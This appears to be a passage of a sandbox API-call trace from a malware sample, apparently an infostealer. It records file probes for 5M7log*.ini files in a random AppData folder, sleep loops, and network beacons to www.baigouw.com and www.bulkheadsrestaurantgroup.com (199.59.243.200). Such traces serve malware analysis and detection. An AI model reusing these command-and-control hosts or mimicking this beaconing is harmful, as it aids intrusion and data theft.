"c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrm.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0176.674] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0176.674] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f93f0) returned 1 [0176.674] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrv.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrv.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.674] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrv.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrv.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0176.674] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0176.674] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f93f0) returned 1 [0176.674] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logro.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logro.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.674] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logro.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logro.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0176.675] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0176.675] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f93f0) returned 1 [0176.675] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logcl.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logcl.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.675] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logcl.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logcl.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0176.675] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0176.675] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f9510) returned 1 [0176.675] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logim.jpeg", NtPathName=0x1302fab0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logim.jpeg", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.675] NtCreateFile (in: FileHandle=0x1302fa50, DesiredAccess=0x120089, ObjectAttributes=0x1302fac0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logim.jpeg" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logim.jpeg"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa60, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa50*=0xffffffffffffffff, IoStatusBlock=0x1302fa60*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0176.675] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302f9d0 | out: HeapArray=0x1302f9d0*=0x5c0000) returned 0x6 [0176.675] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f77d0) returned 1 [0176.675] Sleep (dwMilliseconds=0x7d0) [0176.677] Sleep (dwMilliseconds=0x7d0) [0176.678] Sleep (dwMilliseconds=0x7d0) [0176.680] Sleep (dwMilliseconds=0x7d0) [0176.715] Sleep (dwMilliseconds=0x7d0) [0176.765] Sleep (dwMilliseconds=0x7d0) [0176.819] Sleep (dwMilliseconds=0x7d0) [0176.866] Sleep (dwMilliseconds=0x7d0) [0176.890] Sleep (dwMilliseconds=0x7d0) [0176.942] Sleep (dwMilliseconds=0x7d0) [0177.010] Sleep (dwMilliseconds=0x7d0) [0177.106] Sleep (dwMilliseconds=0x7d0) [0177.174] Sleep (dwMilliseconds=0x7d0) [0177.222] socket (af=2, type=1, protocol=6) returned 0xc5c [0177.222] getaddrinfo (in: pNodeName="www.baigouw.com", pServiceName="80", pHints=0x9e74eb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x9e74ee8 | out: ppResult=0x9e74ee8*=0x0) returned 11001 [0189.599] Sleep (dwMilliseconds=0x7d0) [0189.611] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7log00.ini", NtPathName=0x1302fb20, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7log00.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0189.612] NtCreateFile (in: FileHandle=0x1302fac0, DesiredAccess=0x120089, ObjectAttributes=0x1302fb30*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7log00.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7log00.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fad0, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fac0*=0xffffffffffffffff, IoStatusBlock=0x1302fad0*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0189.612] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa40 | out: HeapArray=0x1302fa40*=0x5c0000) returned 0x6 [0189.612] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x4ac9fc0) returned 1 [0189.612] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logri.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logri.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0189.612] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logri.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logri.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0189.612] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0189.612] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x4ac8700) returned 1 [0189.612] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrf.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrf.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0189.612] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrf.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrf.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0189.612] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0189.612] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x4ac9fc0) returned 1 [0189.612] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrt.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrt.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0189.613] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrt.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrt.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0189.613] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0189.613] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x4ac8c10) returned 1 [0189.613] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrg.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrg.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0189.613] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrg.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrg.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0189.613] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0189.613] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x4ac97e0) returned 1 [0189.613] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0189.613] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrc.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0189.613] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0189.613] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x4ac8c10) returned 1 [0189.613] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrm.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrm.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0189.613] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrm.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrm.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0189.613] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0189.613] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x4ac83a0) returned 1 [0189.613] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrv.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrv.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0189.613] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrv.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrv.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0189.613] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0189.613] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x4ac95a0) returned 1 [0189.613] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logro.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logro.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0189.613] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logro.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logro.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0189.614] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0189.614] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x4ac83a0) returned 1 [0189.614] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logcl.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logcl.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0189.614] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logcl.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logcl.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0189.614] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0189.614] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x4ac8700) returned 1 [0189.614] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logim.jpeg", NtPathName=0x1302fab0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logim.jpeg", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0189.614] NtCreateFile (in: FileHandle=0x1302fa50, DesiredAccess=0x120089, ObjectAttributes=0x1302fac0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logim.jpeg" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logim.jpeg"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa60, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa50*=0xffffffffffffffff, IoStatusBlock=0x1302fa60*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0189.614] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302f9d0 | out: HeapArray=0x1302f9d0*=0x5c0000) returned 0x6 [0189.614] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x4ac8b80) returned 1 [0189.655] socket (af=2, type=1, protocol=6) returned 0x1d10 [0189.656] getaddrinfo (in: pNodeName="www.bulkheadsrestaurantgroup.com", pServiceName="80", pHints=0x9e75258*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x9e75288 | out: ppResult=0x9e75288*=0xa05e4d0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x9f8e410*(sa_family=2, sin_port=0x50, sin_addr="199.59.243.200"), ai_next=0x0)) returned 0 [0189.701] connect (s=0x1d10, name=0x9f8e410*(sa_family=2, sin_port=0x50, sin_addr="199.59.243.200"), namelen=16) returned 0 [0189.732] send (s=0x1d10, buf=0x82e10fa*, len=182, flags=0) returned 182 [0189.733] setsockopt (s=0x1d10, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0189.733] recv (in: s=0x1d10, buf=0x127cf040, len=2048000, flags=0 | out: buf=0x127cf040*) returned 2184 [0189.952] closesocket (s=0x1d10) returned 0 [0189.953] Sleep (dwMilliseconds=0x7d0) [0189.960] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7log00.ini", NtPathName=0x1302fb20, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7log00.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0189.960] NtCreateFile (in: FileHandle=0x1302fac0, DesiredAccess=0x120089, ObjectAttributes=0x1302fb30*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7log00.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7log00.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fad0, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fac0*=0xffffffffffffffff, IoStatusBlock=0x1302fad0*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0189.960] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa40 | out: HeapArray=0x1302fa40*=0x5c0000) returned 0x6 [0189.961] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x4ac91b0) returned 1 [0189.961] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logri.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logri.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0189.961] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logri.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logri.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0189.961] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0189.961] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x4ac9ea0) returned 1 [0189.961] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrf.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrf.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0189.961] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrf.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrf.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, 